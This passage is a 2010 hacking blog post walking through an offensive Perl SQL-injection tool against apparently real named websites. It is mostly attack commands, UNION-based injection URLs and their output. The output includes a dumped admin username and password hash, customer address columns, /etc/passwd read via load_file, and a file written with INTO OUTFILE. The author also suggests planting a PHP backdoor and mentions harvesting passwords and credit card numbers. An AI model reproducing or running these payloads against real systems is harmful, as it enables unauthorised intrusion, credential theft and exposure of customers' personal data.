/&gt;&lt;br /&gt;&lt;br /&gt;- SQL Injection&lt;br /&gt;- Operation System Function&lt;br /&gt;- Dump Database&lt;br /&gt;- Extract Database Schema&lt;br /&gt;- Search Columns Name&lt;br /&gt;- Read File (read only)&lt;br /&gt;- Create File (read only)&lt;br /&gt;- Brute Table &amp;amp; Column&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o] command and option&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|-----------------------------------------------------------------------------|&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| Usage: perl ssdp.pl [options]                                               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                                                                             |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -u [SQLi URL]       target with id parameter or sqli url with c0li string   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -e [sqli end tag]   sql injection end tag (default: "--")                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -d [database name]  this option should not be used (default: @@database)    |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -t [table name]     table_name                                              |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -c [columns name]   column_name (example: id,user,pass,email)               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -s [space code]     SPACE code: +,/**/,%20 (default: "+")                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -f [max field]      max field to get magic number (default: 123)            |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -start [num]        row number to begin dumping data                        |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -stop [num]         row number to stop dumping                              |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -where [query]      your special dumping query                              |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                                                                             |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -info               Get MySQL Information                       [MySQL v4+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -dbase              Concat Databases                            [MySQL v5+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -table              Concat Tables                               [MySQL v5+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -column             Concat Columns                              [MySQL v5+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -tabcol             Concat Tables with Columns                  [MySQL v5+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -find               Search Columns Name                         [MySQL v5+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -magic              Find Magic Number                           [MySQL v4+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -dump               Dump Data                                   [MySQL v4+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -brute              Fuzzing Tables &amp;amp; Columns                    [MySQL v4+] |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                                                                             |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -log [file name]    file name to save ssdp data (default: ssdp.log)         |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;| -p [http proxy]     hostname:port                                           |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|-----------------------------------------------------------------------------|&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o] proof of concept&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x01] magic number (null column).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;first of all we have to find null column (magic number).&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;null column used for execute our SQL query.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [target URL] -magic&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] URL: http://www.460productions.com/store.php?cat=2&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Attempting to find the magic number...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Field Length : 24&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Magic Number : 1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Showing MySQL Information ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Database: 460store&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] User: i460usr@boscgi1002.eigbox.net&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Version: 5.0.51a-log&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] System: redhat-linux-gnu&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Access to "mysql" Database: No&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Read File "/etc/passwd": Yes (w00t)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Create File "/tmp/c0li-430.txt": Yes (w00t)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;our magic number is 1 and it will replace with "c0li" string.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;we can see the database information and operation system too.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x02] finding table&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;now we use URL that include "c0li" string on it to find table &amp;amp; column.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [c0li URL] -table&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] SQLi End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Database Name: database()&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Number of Tables: 18&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Showing tables ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[1] aspect_ratio(2)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[2] audio_format(3)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[3] category(7)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[4] customer(200)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[5] deposit(11)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[6] discount_group(9)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[7] discount_group_price(10)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[8] order()&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[9] order_item(261)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[10] order_source(5)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[11] order_status(4)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[12] order_type(2)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[13] payment_type(4)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[14] product(30)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[15] product_group(17)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[16] security(1)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[17] shopping_cart(0)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[18] user_session(68)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;that is the list of all table in database()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x03] finding column&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;let's see column from table called "security".&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [c0li URL] -t [table] -column&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] SQLi End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Database Name: database()&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Table Name: security&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Number of Columns: 5&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Showing columns from table "security" ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] security(1): user_id,username,password,admin,last_login&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;aha! we got column called "username" and "password".&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x04] dumping data&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;now we'll see information inside that column.. :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] SQLi End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Database Name: database()&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Table Name: security&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Column Name: username,password&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Data Count: 1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Dumping Data ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[1] admin : 2ec20101734c754d&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;we got admin username and password hash. :D&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;ok i have show you how to find magic number, table, column and dump data the column using SSDp.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x05] search column name (-find)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;now i'll show you how to use -find option (Search Columns Name)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;i'll try to search column with keyword "address" it require -c option (column)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] SQLi End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Database Name: 460store&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Column Name string to search: address&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Searching for Columns Path ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Columns Found:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[1] 460store.customer.email_address&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[2] 460store.customer.address_line1&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[3] 460store.customer.address_line2&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[4] 460store.customer.address_city&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[5] 460store.customer.address_state&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[6] 460store.customer.address_zip&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[7] 460store.customer.address_country&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[8] 460store.customer.address_name&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;found column with word "address" on table "customer". easy right? :p&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x06] read &amp;amp; create file (read only)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;now let's see Read File (read only) &amp;amp; Create File (read only).&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;as you can see at the first time we find magic number you'll find this line.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Read File "/etc/passwd" : Yes (w00t)&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] Create File "/tmp/c0li-159.txt" : Yes (w00t)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;to use load_file you need to convert the /etc/passwd into hexadecimal. &lt;a href="http://pacenoge.org/encdec"&gt;http://pacenoge.org/encdec&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;the result will be like this.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;root:x:0:0:root:/root:/bin/bash&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;bin:x:2:2:bin:/bin:/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;sys:x:3:3:sys:/dev:/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;sync:x:4:65534:sync:/bin:/bin/sync&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;games:x:5:60:games:/usr/games:/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;man:x:6:12:man:/var/cache/man:/bin/sh&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;let's create some file in /tmp directory. :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,"Simple SQLi Dumper",8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+"/tmp/ssdp.txt"--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;URL above means we write "Simple SQLi Dumper" into ssdp.txt that locate at /tmp directory.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;to see if it works or no lets read /tmp/ssdp.txt using load_file function. don't forget to convert it first.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;and you will see result like this.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;that the word we write in /tmp/ssdp.txt.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :))&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x07] brute MySQL v4&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;guessing table &amp;amp; column for MySQL v4.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;you can add your own table name &amp;amp; column name by editing file called tables.dict &amp;amp; columns.dict.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;# perl ssdp.pl -u [c0li URL] -brute&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[x]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|             Simple SQLi Dumper v5.1               |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;|                Coded by Vrs-hCk                   |&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[o]=================================================[o]&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Date : Sun Mar 21 19:31:42 2010&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; Help Command: -h, -help, --help&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[+] SQLi End Tag: --&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Finding Tables &amp;amp; Columns ...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[1] admin_user: username,password,email,adminid,adminname,phone,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Done.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;found table "admin_user"&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;found column "username" "password" "email" "adminid" "adminname" "phone"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x08] conclusion&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;by using SSDp, it's very easy to find SQL injection vulnerability at certain vulnerable parameter or string.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;you can dump data from MySQL database columns and it works nicely.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;but, i suggest using this tool in a right way. okey dude?? :p&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x09] references&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;perl ssdp.pl -h&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://en.wikipedia.org/wiki/SQL_injection&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[0x10] greetz ^^&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Vrs-hCk OoN_Boy paman zxvf angel stardustmemory&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;s4va xr00tb0y S3T4N pizzyroot matthews martfella&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;[MH] MainHack BrotherHood - [SiD] ServerIsDown UnderGrounD - AntiSecurity.org Team&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8019309837081416276?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8019309837081416276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8019309837081416276' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8019309837081416276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8019309837081416276'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/03/simple-sqli-dumper-v51-how-to.html' title='Simple SQLi Dumper v5.1 [ How To ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' 